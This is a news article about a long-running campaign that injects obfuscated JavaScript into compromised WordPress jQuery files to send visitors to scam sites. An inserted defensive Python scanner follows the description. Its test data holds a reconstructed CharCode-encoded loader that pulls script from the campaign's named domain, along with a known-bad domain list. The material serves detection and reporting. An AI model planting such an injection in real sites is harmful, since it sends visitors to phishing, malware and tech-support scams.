Anatomy of a campaign to inject JavaScript into compromised WordPress sites

Reverse-engineered code redirects visitors to dodgy corners of the internet


A years-long campaign by miscreants to insert malicious JavaScript into vulnerable WordPress sites, so that visitors are redirected to scam websites, has been documented by reverse-engineers.

An investigation by analysts at Sucuri into malware found on WordPress installations revealed a much larger and ongoing campaign that last month, we're told, hijacked more than 6,600 websites. The team has seen a spike in complaints this month related to the intrusions, according to analyst Krasimir Konov.

"The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Konov wrote.

Those included core files such as ./wp-includes/js/jquery/jquery.min.js and ./wp-includes/js/jquery/jquery-migrate.min.js. Essentially, the miscreants compromise a website and then attempt to automatically inject their own malicious code into any .js file with jQuery in its filename.

They also used CharCode obfuscation, encoding the malicious JavaScript as lists of numeric character codes, to evade detection. The obfuscated code is active on every page that pulls in the vandalized jQuery library files, enabling the attacker to redirect the site's visitors to whatever destination they choose: usually phishing pages, malware-laced downloads, ad banners, or even more redirects, we're told.

To do this, the malicious injection creates a new script element on the page with legendarytable[.]com as the source domain. The code served from that domain calls out to a second external domain, local[.]drakefollow[.]com, which calls out to another, setting up a chain of domains the visitor is bounced through until they land on one of many possible final destinations.
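As an added defender-side example (not code from the article, from Sucuri, or from WordPress), here is a small Python scanner that applies the indicators described above: it looks through jQuery-named .js files for long numeric `String.fromCharCode` lists, decodes them, and flags any decoded payload that creates a script element pointing at a domain other than the site's own, also matching against the two redirect-chain domains the article names. The file contents, the site hostname `victim.example` and the domain `cdn-update.example` are constructed test data, not real samples.

```python
import re
from typing import Dict, List

# The two redirect-chain domains named in the article (defanged brackets removed).
KNOWN_BAD_DOMAINS = {"legendarytable.com", "local.drakefollow.com"}

# String.fromCharCode(...) whose arguments are a plain comma-separated list of numbers.
# Genuine jQuery calls fromCharCode with a single computed argument, which this does not match.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*((?:\d+\s*,\s*)+\d+)\s*\)")
SCRIPT_ELEMENT_RE = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)


def decode_charcode_runs(js: str, min_codes: int = 20) -> List[str]:
    """Decode every numeric String.fromCharCode list with at least min_codes entries."""
    runs = []
    for match in CHARCODE_RE.finditer(js):
        codes = [int(c) for c in re.split(r"\s*,\s*", match.group(1).strip())]
        if len(codes) >= min_codes:
            runs.append("".join(chr(c) for c in codes))
    return runs


def scan_js_file(path: str, content: str, site_host: str) -> Dict:
    """Check one .js file for the pattern described above: CharCode-obfuscated code
    that creates a <script> element sourced from a domain other than the site's own."""
    decoded = decode_charcode_runs(content)
    external_hosts: List[str] = []
    creates_script = False
    for text in decoded:
        if SCRIPT_ELEMENT_RE.search(text):
            creates_script = True
        for host in URL_HOST_RE.findall(text):
            host = host.lower()
            if host != site_host.lower() and host not in external_hosts:
                external_hosts.append(host)
    known_bad = sorted(h for h in external_hosts if h in KNOWN_BAD_DOMAINS)
    return {
        "path": path,
        "jquery_file": "jquery" in path.lower(),  # the campaign targets jQuery-named files
        "charcode_payloads": len(decoded),
        "external_hosts": external_hosts,
        "known_bad_hosts": known_bad,
        "suspicious": bool(decoded) and ((creates_script and bool(external_hosts)) or bool(known_bad)),
    }


def scan_site(files: Dict[str, str], site_host: str) -> List[Dict]:
    """Scan a {path: content} map and return only the suspicious findings."""
    return [f for f in (scan_js_file(p, c, site_host) for p, c in files.items()) if f["suspicious"]]


# --- Constructed test data (not real file contents) -------------------------

def _charcode_literal(text: str) -> str:
    """Build a numeric fromCharCode list so the samples have the shape the scanner looks for."""
    return "String.fromCharCode(" + ",".join(str(ord(ch)) for ch in text) + ")"


# Stand-in for a clean minified jQuery: its single computed fromCharCode argument must not trigger.
CLEAN_JQUERY = "/*! jQuery stand-in */ function esc(high){return String.fromCharCode( high + 0x10000 )}"

# Decoded form of the script-element loader described in the article, using the domain it names.
INJECTED_JQUERY = CLEAN_JQUERY + ";" + _charcode_literal(
    'var s=document.createElement("script");s.src="https://legendarytable.com/";document.head.appendChild(s);'
)

# Same shape, but pointing at a constructed, unlisted domain: the heuristic should still flag it.
INJECTED_UNKNOWN_HOST = CLEAN_JQUERY + ";" + _charcode_literal(
    'var s=document.createElement("script");s.src="https://cdn-update.example/";document.head.appendChild(s);'
)

SAMPLE_SITE = {
    "./wp-includes/js/jquery/jquery.min.js": INJECTED_JQUERY,
    "./wp-includes/js/jquery/jquery-migrate.min.js": CLEAN_JQUERY,
    "./wp-content/themes/demo/vendor/jquery-ui.min.js": INJECTED_UNKNOWN_HOST,
}

if __name__ == "__main__":
    for finding in scan_site(SAMPLE_SITE, "victim.example"):
        print(finding["path"], "->", finding["external_hosts"], "known bad:", finding["known_bad_hosts"])
```

The domain allow-list check is deliberately loose: any decoded payload that builds a script element and references a host other than the site's own is reported, so the scanner does not depend on the redirect chain reusing the domains already published. In practice the cleanest response is to compare the flagged files against pristine copies from the WordPress release, since the article notes the injection also lands in the database, which a file scan alone will not catch.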

"At this point, it's a free for all," Konov wrote. "Domains at the end of the redirect chain may be used to load advertisements, phishing pages, malware, or even more redirects."

Before landing on the final destination page, some visitors are sent to a fake CAPTCHA page, which tries to trick them into subscribing to push notifications from the malicious site.

"If they click on the fake CAPTCHA, they'll be opted in to receive unwanted ads even when the site isn't open — and ads will look like they come from the operating system, not from a browser," he wrote.

"These sneaky push notification opt-in maneuvers also happen to be one of the most common ways attackers display 'tech support' scams, which inform users that their computer is infected or slow and they should call a toll-free number to fix the problem."

WordPress powers about 43 percent of the websites on the internet, according to W3Techs, but that reach also makes it a popular target for bad actors. About 90 percent of the website clean-up requests Sucuri receives are related to WordPress, and malicious redirects are the result of some of the most common malware infections, the company said.

"As new vulnerabilities in WordPress plugins are discovered, we anticipate that they will be caught up in the massive ongoing redirect campaign sending unsuspecting victims to fraudulent websites and tech support scams," they wrote. ®

